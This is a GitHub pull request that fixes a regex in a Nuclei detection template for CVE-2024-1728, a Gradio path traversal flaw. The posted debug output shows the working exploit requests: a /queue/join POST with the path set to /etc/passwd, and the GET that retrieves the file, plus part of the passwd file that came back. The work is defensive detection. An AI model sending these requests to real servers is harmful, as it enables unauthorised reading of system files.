Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Fixed CVE-2024-1728 False Negatives by Adjusting Regex Expressions #10518

Merged
merged 3 commits into from
Oct 7, 2024
Merged

Fixed CVE-2024-1728 False Negatives by Adjusting Regex Expressions #10518

merged 3 commits into from
Oct 7, 2024

Conversation

ShaneIan
Copy link
Contributor

@ShaneIan ShaneIan commented Aug 12, 2024
edited
Loading

Template / PR Information

  • Fixed CVE-2024-1728.yaml: Resolved issues with false negatives caused by a greedy regex expression in the Nuclei template for detecting the Gradio path traversal vulnerability.
  • References:

Template Validation

I've validated this template locally?

  • YES
  • NO

Additional Details (leave it blank if not applicable)

  • Tested on both Windows and Linux environments: The template was tested on both enviroments to ensure it accurately detects the vulnerability without false negatives.
    • Caveat: On Windows, the Gradio server required additional logic to block Linux file paths. Without this adjustment, Linux file paths caused issues on the Windows server.
  • Regex Refinement: Adjusted the regex to avoid greedy matching, specifically focusing on the path traversal patterns used in Gradio.

Additional References:

@ShaneIan
Update CVE-2024-1728.yaml
bb5d661 
The previous version of the template used a greedy regex expression (.*), which was causing false negatives during testing on both Windows and Linux systems.
@ShaneIan
Update CVE-2024-1728.yaml
504b51f
@GeorginaReeder
Copy link

Thanks so much for your contribution @ShaneIan , we appreciate it! :)

@princechaddha
Copy link
Member

Hello, the response time for this PR was longer than usual because the team was traveling for DEFCON. Thank you for your contribution.

Could you please confirm why the POST data was updated to remove the extra array brackets? Can you also confirm if it still works without them? Additionally, if you could share the redacted debug data, that would be very helpful.

@princechaddha princechaddha added the good first issue Good for newcomers label Aug 26, 2024
@princechaddha princechaddha self-assigned this Aug 26, 2024
@ShaneIan
Copy link
Contributor Author

Yes, of course.

For the duplicate bracket, I saw no reason for it to be there, as it was seemingly causing an error on my simulated client side. The client’s fileInput was expecting a dictionary, not a list, so formatting it as such was causing the fileInput to misunderstand. And yes, as of the last testing with the removed brackets, the template was able to produce positive results.

As for the debug data, this is my first contribution, so I am unsure exactly what you mean. However, I absolutely can help.

@princechaddha
Copy link
Member

@ShaneIan, thank you for the confirmation. For the debug data, please run the template with the -debug flag and share the response, making sure to remove any host data if it’s public. This is help us validate the template easily

@ShaneIan
Copy link
Contributor Author

Nuclei Debug Output

I ran the template with debug information as requested:

nuclei -t CVE-2024-1728-debug.yaml -u https://8c4e50cf2fa07a02f3.gradio.live -debug

Output:

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.3.0

                projectdiscovery.io

[INF] Your current nuclei-templates v9.9.2 are outdated. Latest is v9.9.3
[INF] Successfully updated nuclei-templates (v9.9.3) to /home/username/nuclei-templates. GoodLuck!
[WRN] Setting thread count to 0 for 2 templates, dynamic extractors are not supported with payloads yet
[INF] Current nuclei version: v3.3.0 (outdated)
[INF] Current nuclei-templates version: v9.9.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 56
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2024-1728] Dumped HTTP request for https://8c4e50cf2fa07a02f3.gradio.live/queue/join

POST /queue/join HTTP/1.1
Host: 8c4e50cf2fa07a02f3.gradio.live
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Connection: close
Content-Length: 246
Content-Type: application/json
Accept-Encoding: gzip

{"data":[{"path":"/etc/passwd","url":"https://8c4e50cf2fa07a02f3.gradio.live/file=/help","orig_name":"CHANGELOG.md","size":3549,"mime_type":"text/plain"}],"event_data":null,"fn_index":0,"trigger_id":2,"session_hash":"2lO2isOTC6iTjxeQH2PPsv2vBoF"}
[DBG] [CVE-2024-1728] Dumped HTTP response https://8c4e50cf2fa07a02f3.gradio.live/queue/join

HTTP/1.1 200 OK
Connection: close
Content-Length: 47
Content-Type: application/json
Date: Fri, 30 Aug 2024 16:55:32 GMT
Server: uvicorn

{"event_id":"8a0ceca55f544957bbba889309dd3f3b"}
[INF] [CVE-2024-1728] Dumped HTTP request for https://8c4e50cf2fa07a02f3.gradio.live/queue/data?session_hash=2lO2isOTC6iTjxeQH2PPsv2vBoF

GET /queue/data?session_hash=2lO2isOTC6iTjxeQH2PPsv2vBoF HTTP/1.1
Host: 8c4e50cf2fa07a02f3.gradio.live
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

[DBG] [CVE-2024-1728] Dumped HTTP response https://8c4e50cf2fa07a02f3.gradio.live/queue/data?session_hash=2lO2isOTC6iTjxeQH2PPsv2vBoF

HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Content-Type: text/event-stream; charset=utf-8
Date: Fri, 30 Aug 2024 16:55:33 GMT
Server: uvicorn

data: {"msg": "estimation", "event_id": "8a0ceca55f544957bbba889309dd3f3b", "rank": 0, "queue_size": 1, "rank_eta": null}

data: {"msg": "process_starts", "event_id": "8a0ceca55f544957bbba889309dd3f3b", "eta": null}

data: {"msg": "process_completed", "event_id": "8a0ceca55f544957bbba889309dd3f3b", "output": {"data": ["/tmp/gradio/uploads/passwd"], "is_generating": false, "duration": 0.0003364086151123047, "average_duration": 0.0003364086151123047}, "success": true}

[INF] [CVE-2024-1728] Dumped HTTP request for https://8c4e50cf2fa07a02f3.gradio.live/file=/tmp/gradio/uploads/passwd

GET /file=/tmp/gradio/uploads/passwd HTTP/1.1
Host: 8c4e50cf2fa07a02f3.gradio.live
User-Agent: Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

[DBG] [CVE-2024-1728] Dumped HTTP response https://8c4e50cf2fa07a02f3.gradio.live/file=/tmp/gradio/uploads/passwd

HTTP/1.1 200 OK
Connection: close
Content-Length: 1416
Accept-Ranges: bytes
Content-Type: text/plain; charset=utf-8
Date: Fri, 30 Aug 2024 16:55:33 GMT
Etag: "1e8d128acb45e2fb5860a2c19e940891"
Last-Modified: Mon, 18 Mar 2024 22:13:35 GMT
Server: uvicorn

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
tcpdump:x:107:113::/nonexistent:/usr/sbin/nologin

Findings:

[CVE-2024-1728:regex-1] [http] [high] https://8c4e50cf2fa07a02f3.gradio.live/file=/tmp/gradio/uploads/passwd [path="/etc/passwd"]
[CVE-2024-1728:status-2] [http] [high] https://8c4e50cf2fa07a02f3.gradio.live/file=/tmp/gradio/uploads/passwd [path="/etc/passwd"]

@princechaddha
Copy link
Member

Hi @ShaneIan, thank you for sharing the additional data. The PR notification was somehow missed and remained open. Thank you once again for updating the template

@princechaddha princechaddha merged commit 529ab72 into projectdiscovery:main Oct 7, 2024
3 checks passed
@princechaddha princechaddha added the Done Ready to merge label Oct 7, 2024
@princechaddha
Copy link
Member

You can grab some cool PD stickers over here http://nux.gg/stickers 😄

@techcraver
Copy link

Hey @ShaneIan thanks for the sticker request! I'll send some off when I have them in hand (I'm new to the PD team and they're on order. :) )

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@princechaddha princechaddha

Labels
Done Ready to merge good first issue Good for newcomers Hacktoberfest
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
4 participants
@ShaneIan @GeorginaReeder @princechaddha @techcraver